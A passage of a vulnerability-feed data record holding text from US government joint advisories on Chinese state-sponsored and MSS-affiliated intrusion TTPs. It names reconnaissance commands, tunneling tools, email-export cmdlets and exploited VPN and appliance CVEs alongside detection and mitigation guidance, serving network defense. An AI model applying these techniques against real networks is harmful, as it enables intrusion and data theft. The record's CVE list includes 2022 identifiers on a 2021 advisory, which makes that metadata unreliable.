passwords for multiple accounts.\n\n * Consider disabling or restricting NTLM. \n\n * Consider disabling `WDigest` authentication. \n\n * Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).\n\n * Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements. \n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. \n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-10T02:50:59", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used 